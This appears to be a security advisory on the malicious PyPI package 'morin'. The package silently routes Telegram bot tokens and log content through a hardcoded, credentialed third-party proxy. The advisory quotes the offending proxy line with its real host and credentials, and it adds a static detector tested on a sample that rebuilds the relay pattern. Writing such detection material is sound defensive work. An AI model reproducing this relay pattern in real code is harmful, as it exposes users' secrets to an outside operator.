
MAL-2026-4757

Malicious code in morin (PyPI)

Details


## Source: amazon-inspector (37c27d25a4c203cbb89156281fbacc7feb424a09eaa296f7c3dedff860891f1f)

morin/common.py hardcodes an HTTP proxy at 191.102.147.15:8000 with embedded credentials (`proxies = {'https': 'http://5TUMV6:sq3suS@191.102.147.15:8000'}`) and unconditionally routes all Telegram API calls through it via `requests.get(url, params=params, proxies=proxies, timeout=15)` where `url=https://api.telegram.org/bot{bot_token}/sendMessage`. Every Clickhouse/connector class in the package funnels through `Common.log_func` / `Common.send_logs`, so any caller using the package's notification feature ends up tunneling their Telegram bot_token (carried in the URL path) and log message content through this third-party host. The proxy is not the publisher's documented infrastructure, is not mentioned in the package documentation, and the operator of 191.102.147.15:8000 can observe and tamper with the CONNECT-tunneled traffic, including capturing the bearer bot tokens. This is the silent-relay shape: a public API quietly redirects caller-supplied secrets through an attacker- or third-party-controlled destination.
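The pattern described above (a hardcoded proxy dict with embedded credentials, bound at module level and passed unconditionally as `proxies=` to a `requests` call) can be caught with a static check before a dependency is installed. The following is an added example written for this advisory, not code from the morin package or from the Amazon Inspector source; `SAMPLE_SOURCE` is a constructed module with a placeholder host and credentials (TEST-NET address, not the real indicator), and `find_hardcoded_proxies` is a hypothetical helper name.

```python
"""Static check for the silent-relay shape: a literal proxy URL (possibly with
embedded credentials) reaching a requests.* call through the proxies= keyword.
Added example; not code from the morin package or the advisory source."""
import ast
from urllib.parse import urlsplit

# Constructed sample mirroring the advisory's shape. Placeholder host and
# credentials only; this is NOT the real indicator from the advisory.
SAMPLE_SOURCE = '''
import requests

proxies = {'https': 'http://user:secret@198.51.100.7:8000'}

def send_logs(bot_token, chat_id, text):
    url = f"https://api.telegram.org/bot{bot_token}/sendMessage"
    params = {"chat_id": chat_id, "text": text}
    return requests.get(url, params=params, proxies=proxies, timeout=15)

def clean_call(url):
    return requests.get(url, timeout=15)
'''


def _urls_from_literal(node):
    """Collect string values from a dict literal like {'https': 'http://...'}."""
    if isinstance(node, ast.Dict):
        return [v.value for v in node.values
                if isinstance(v, ast.Constant) and isinstance(v.value, str)]
    return []


def _call_name(func):
    """Dotted name of a call target, e.g. 'requests.get' or 'session.post'."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def find_hardcoded_proxies(source):
    """Return findings for calls that pass a literal (or literal-assigned)
    proxies= argument. Each finding is a dict with keys
    line, call, proxy_url, proxy_host, has_credentials."""
    tree = ast.parse(source)

    # Pass 1: names bound to a literal proxy dict anywhere in the module.
    bound = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign):
            urls = _urls_from_literal(node.value)
            if urls:
                for target in node.targets:
                    if isinstance(target, ast.Name):
                        bound[target.id] = urls

    # Pass 2: calls carrying proxies=<literal dict or bound name>.
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        for kw in node.keywords:
            if kw.arg != "proxies":
                continue
            urls = _urls_from_literal(kw.value)
            if isinstance(kw.value, ast.Name):
                urls = bound.get(kw.value.id, [])
            for url in urls:
                parts = urlsplit(url)
                findings.append({
                    "line": node.lineno,
                    "call": _call_name(node.func),
                    "proxy_url": url,
                    "proxy_host": parts.hostname,
                    # Credentials in the proxy URL are the strongest signal:
                    # legitimate code reads them from config, not a literal.
                    "has_credentials": bool(parts.username or parts.password),
                })
    return findings


if __name__ == "__main__":
    for finding in find_hardcoded_proxies(SAMPLE_SOURCE):
        print(finding)
```

Run it over each `.py` file in an unpacked sdist or wheel; any finding whose `proxy_host` is not an address you operate deserves a manual look, and `has_credentials` being true is a red flag on its own. The check is deliberately narrow (literal dicts and names bound to them); a proxy assembled at runtime or passed via a `Session` object's `proxies` attribute would need additional rules.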


Affected packages

PyPI / morin

No fixed version published yet for morin (pip). Pin to a known-safe version or switch to an alternative.

References